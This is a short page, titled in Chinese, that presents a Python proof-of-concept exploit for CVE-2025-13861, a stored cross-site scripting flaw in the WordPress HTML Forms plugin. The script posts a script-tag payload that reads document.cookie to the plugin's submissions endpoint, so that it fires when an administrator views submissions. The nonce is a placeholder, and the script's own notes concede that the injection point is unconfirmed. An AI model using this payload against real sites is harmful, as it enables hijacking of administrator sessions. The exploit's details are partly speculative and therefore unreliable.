CVE-2025-13861 WordPress HTML Forms插件存储型XSS漏洞

import requests import sys # CVE-2025-13861 PoC - WordPress HTML Forms Plugin Stored XSS # Target: WordPress site with HTML Forms plugin <= 1.6.0 target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" # Malicious payload for file upload field metadata # This payload exploits the lack of sanitization in file field metadata handling xss_payload = '<script>alert(document.cookie)</script>' # The plugin stores file metadata without proper sanitization # Payload can be injected through crafted form submission form_data = { 'html-form-id': '1', 'field-name': 'file_upload', 'field-value': xss_payload, '_wpnonce': 'attacker_need_to_obtain' # WordPress nonce may be bypassed in some configs } # Step 1: Submit form with malicious file metadata submit_url = f"{target_url}/wp-json/html-forms/v1/submissions" response = requests.post(submit_url, data=form_data) print(f"[+] Form submission sent: {response.status_code}") # Step 2: When admin views submissions, XSS will execute admin_view_url = f"{target_url}/wp-admin/admin.php?page=html-forms&view=submissions&form_id=1" print(f"[+] Malicious payload stored. Admin must visit: {admin_view_url}") print(f"[+] XSS payload: {xss_payload}") # Note: Actual exploitation may require: # 1. Bypassing WordPress nonce protection in certain configurations # 2. Finding valid form ID # 3. Understanding the specific injection point in file metadata print("\n[!] This PoC is for educational purposes only.")